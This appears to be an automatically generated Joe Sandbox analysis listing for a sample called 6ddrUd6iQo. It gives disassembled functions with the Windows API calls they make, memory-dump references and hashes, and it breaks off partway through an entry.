Opcode Fuzzy Hash: 20fcb763a53e3b1d85934c80fed8adbc755d27e6dcbdb5b0b49a2968c21268b3
Instruction Fuzzy Hash: E631E4B4601204BFEF279F18CC85FA937ACEB05352F254A16FE51F62B0DE30A9488B41

Function 0035ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0035AE1A
GetWindowRect.USER32(?,?), ref: 0035AE90
PtInRect.USER32(?,?,0035C304), ref: 0035AEA0
MessageBeep.USER32(00000000), ref: 0035AF11

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1ab07ce7856bcbdd31c7731f61a14217d6d2682cbba482003652a0b7466b3690
Instruction ID: dc8e6a8cfe2a17807a7e09bdaf66aea8230cbbb10798e7bfd3e63fc7d672271a
Opcode Fuzzy Hash: 1ab07ce7856bcbdd31c7731f61a14217d6d2682cbba482003652a0b7466b3690
Instruction Fuzzy Hash: 0E41C070604609DFCB13CF58C886E697BF9FB49342F1682A9E8059B270D731A805EF52

Function 00330FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00331037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00331053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003310B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0033110B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b42da222b8ee6df10ed5af5c7ee186fb2659df25fe01faa1a11541b19618f637
Instruction ID: 08549a7be6d5bca5a831a6cf11349e73dc16ef24cd1c6986e04921b03ab2a96e
Opcode Fuzzy Hash: b42da222b8ee6df10ed5af5c7ee186fb2659df25fe01faa1a11541b19618f637
Instruction Fuzzy Hash: C7316C30E40688AEFF3B8B65CC85BFEBBADAB49311F08431AF580565E1C37489D49751

Function 00331121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00331176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00331192
PostMessageW.USER32(00000000,00000101,00000000), ref: 003311F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00331243

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: de8b9dc12535892db217e54fba314fa22cc8831cf1975ad99c7137bf023e758b
Instruction ID: 6ec463b3f2fe89e06e4e969594e5e62bd6bbe5e57d1fd8522ebe5959b49b5786
Opcode Fuzzy Hash: de8b9dc12535892db217e54fba314fa22cc8831cf1975ad99c7137bf023e758b
Instruction Fuzzy Hash: 52315830E4030C6EFF378A668C457FABBBEAB49310F04471AF580925E1C3348A949761

Function 00306415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0030644B
__isleadbyte_l.LIBCMT ref: 00306479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003064A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003064DD

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: c6898a422a9b01e7c2ca00b265084195125339a404188961ff899882660ac52a
Instruction ID: b847e578ec129b984b4e9a007844b13c725fb0624236118a47673980f8f2a49e
Opcode Fuzzy Hash: c6898a422a9b01e7c2ca00b265084195125339a404188961ff899882660ac52a
Instruction Fuzzy Hash: EB31C131602256AFDB228F76CC56BBA7BA9FF41310F164029F854871E5EB31D860DB90

Function 00355175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00355189

Part of subcall function 0033387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00333897
Part of subcall function 0033387D: GetCurrentThreadId.KERNEL32 ref: 0033389E
Part of subcall function 0033387D: AttachThreadInput.USER32(00000000,?,003352A7), ref: 003338A5

GetCaretPos.USER32(?), ref: 0035519A
ClientToScreen.USER32(00000000,?), ref: 003551D5
GetForegroundWindow.USER32 ref: 003551DB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 186c7a7973464340ba3018c82d1732fea1c3ef6346a1e9c6459a287299874a3b
Instruction ID: 9823a6220237d34f20d2fc093e997db6cf98019c22275130e005bb1057100613
Opcode Fuzzy Hash: 186c7a7973464340ba3018c82d1732fea1c3ef6346a1e9c6459a287299874a3b
Instruction Fuzzy Hash: BF311E71910118AFDB01EFA5C8859EFB7FDEF58304F10806AF415E7251EA75AE45CBA0

Function 00328B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00328652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328669
Part of subcall function 00328652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328673
Part of subcall function 00328652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328682
Part of subcall function 00328652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00328689
Part of subcall function 00328652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0032869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00328BEB
_memcmp.LIBCMT ref: 00328C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00328C44
HeapFree.KERNEL32(00000000), ref: 00328C4B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: b887257d9c0f2f38e82838b8135ce94804776d8d5bfaf6a8c74ccfedeff58656
Instruction ID: 96287b84430e302f62ed40d60a6b8cc17a9dea65c4df33cf9f267a9f05d8516c
Opcode Fuzzy Hash: b887257d9c0f2f38e82838b8135ce94804776d8d5bfaf6a8c74ccfedeff58656
Instruction Fuzzy Hash: 6221AC71E02228EFDB01DFA4D984BEEF7B8EF40355F1540A9E554AB240DB30AE06CB60

Function 002F0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 002F0BF2

Part of subcall function 002D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337B20,?,?,00000000), ref: 002D5B8C
Part of subcall function 002D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337B20,?,?,00000000,?,?), ref: 002D5BB0

_fprintf.LIBCMT ref: 002F0C29
OutputDebugStringW.KERNEL32(?), ref: 00326331

Part of subcall function 002F4CDA: _flsall.LIBCMT ref: 002F4CF3

__setmode.LIBCMT ref: 002F0C5E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: c07cf2401309bade5c2cc02879ad5ca8bad26c3a06d46b8fcca88d580acad397
Instruction ID: caf43533504694ee83bef353abebb0b1ff67a1ccfb7d4c4603c6a3d0f0128284
Opcode Fuzzy Hash: c07cf2401309bade5c2cc02879ad5ca8bad26c3a06d46b8fcca88d580acad397
Instruction Fuzzy Hash: E411273292461C7EDB05B7B4AC839BEFB699F41360F14012BF30457292DFA11DA24B95

Function 00341A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00341A97

Part of subcall function 00341B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00341B40
Part of subcall function 00341B21: InternetCloseHandle.WININET(00000000), ref: 00341BDD

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: c0db7a845565b305b9bf313c7d6ee93324fcbedb0124f88e3851d53886f65bd9
Instruction ID: 4890bd7f588f192fb3e02e231ed823c1a246a2aa1d190a2497d7afd3c9dd6e58
Opcode Fuzzy Hash: c0db7a845565b305b9bf313c7d6ee93324fcbedb0124f88e3851d53886f65bd9
Instruction Fuzzy Hash: 0C218035204A01BFDB139F608C01FBBBBEDFB48741F11011AFA569A661EB71B8519794

Function 0032E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0032F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0032E1C4,?,?,?,0032EFB7,00000000,000000EF,00000119,?,?), ref: 0032F5BC
Part of subcall function 0032F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0032F5E2
Part of subcall function 0032F5AD: lstrcmpiW.KERNEL32(00000000,?,0032E1C4,?,?,?,0032EFB7,00000000,000000EF,00000119,?,?), ref: 0032F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0032EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0032E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0032E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0032EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0032E237

Strings

cdecl, xrefs: 0032E22E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d8225987145e53c5dd3ad9d0565b1e334748fdba3fc31142c212a018216b0982
Instruction ID: d580e1c47928792a41dd1636e8211d1bb9c32465cccb97941e82fca526a28e36
Opcode Fuzzy Hash: d8225987145e53c5dd3ad9d0565b1e334748fdba3fc31142c212a018216b0982
Instruction Fuzzy Hash: C711B13A100355EFCB26AF74E84697A77BCFF45350B40453AE816CB260EB719950C7A0

Function 00305332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00305351

Part of subcall function 002F594C: __FF_MSGBANNER.LIBCMT ref: 002F5963
Part of subcall function 002F594C: __NMSG_WRITE.LIBCMT ref: 002F596A
Part of subcall function 002F594C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001), ref: 002F598F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c3637e1664da0bd9a2faf9008f250748742cc2acd1172a88f165f79f5c668af0
Instruction ID: 266d800eea6eb142546dc1496244ad93906235a2717b700a67c4f7d23b7b73fa
Opcode Fuzzy Hash: c3637e1664da0bd9a2faf9008f250748742cc2acd1172a88f165f79f5c668af0
Instruction Fuzzy Hash: 5011C436506A19AFCB232F70AC6576FB79C9F143E0F11447AFA44961E0DA7189508F90

Function 002D4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D4560

Part of subcall function 002D410D: _memset.LIBCMT ref: 002D418D
Part of subcall function 002D410D: _wcscpy.LIBCMT ref: 002D41E1
Part of subcall function 002D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002D41F1

KillTimer.USER32(?,00000001,?,?), ref: 002D45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002D45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0030D6CE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 68b8a521bc2465701d70396bf2d68e51b4c058d7ae09b1c21f8608e07ee8b9af
Instruction ID: f86ea7e0689883a7facca09c20569c1b3b3be27a62ff8444b378b3288730dd39
Opcode Fuzzy Hash: 68b8a521bc2465701d70396bf2d68e51b4c058d7ae09b1c21f8608e07ee8b9af
Instruction Fuzzy Hash: 102101B0905388AFEB339B64D855BE7BBECAF11308F40009EE29E56281C7B55E84CB51

Function 003340B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003340D1
_memset.LIBCMT ref: 003340F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00334144
CloseHandle.KERNEL32(00000000), ref: 0033414D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: ab1de9b629a6e49af42c80592ae805896a37a37ee7076ed8f941e9cdb9707443
Instruction ID: d78b1a26e43490ccec94401ff2b6b4f9e26514c1d3874a64b40e9561c5465d70
Opcode Fuzzy Hash: ab1de9b629a6e49af42c80592ae805896a37a37ee7076ed8f941e9cdb9707443
Instruction Fuzzy Hash: 9311E7759013287AE7309BA5AC4DFBBBB7CEF44760F1041AAF908D7190D6744E808BA4

Function 00328AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00328B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00328B31
CloseHandle.KERNEL32(00000004), ref: 00328B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00328B7A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 0bdae6894c3b3dec0c93c702438a441430dfd0f6f253383c2d6fc141b4b468fe
Instruction ID: 85e6283bdc2105aa366703aeebc72ea6ae84ee3b831df51cda6ff4dbc9ae632b
Opcode Fuzzy Hash: 0bdae6894c3b3dec0c93c702438a441430dfd0f6f253383c2d6fc141b4b468fe
Instruction Fuzzy Hash: 15115CB2501209AFDF028FA4ED49FEA7BADEF08745F054068FE05A2160C7758D609B60

Function 0034667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337B20,?,?,00000000), ref: 002D5B8C
Part of subcall function 002D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337B20,?,?,00000000,?,?), ref: 002D5BB0

gethostbyname.WS2_32(?), ref: 003466AC
WSAGetLastError.WS2_32(00000000), ref: 003466B7
_memmove.LIBCMT ref: 003466E4
inet_ntoa.WS2_32(?), ref: 003466EF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e52d0d67c80549a882ce5de15fec48cde24130b98e79850af66f5a7aca93a804
Instruction ID: 612a276d5dd5c0faaa564ba10bea25d811c3eb5c2e5dabef17a1a93e58ad484f
Opcode Fuzzy Hash: e52d0d67c80549a882ce5de15fec48cde24130b98e79850af66f5a7aca93a804
Instruction Fuzzy Hash: F9116D35910609AFCB01FFA4DD86DEEB7B8AF04311B144066F502AB2A1DF70AE24CB61

Function 00329023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00329043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00329055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00329086

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
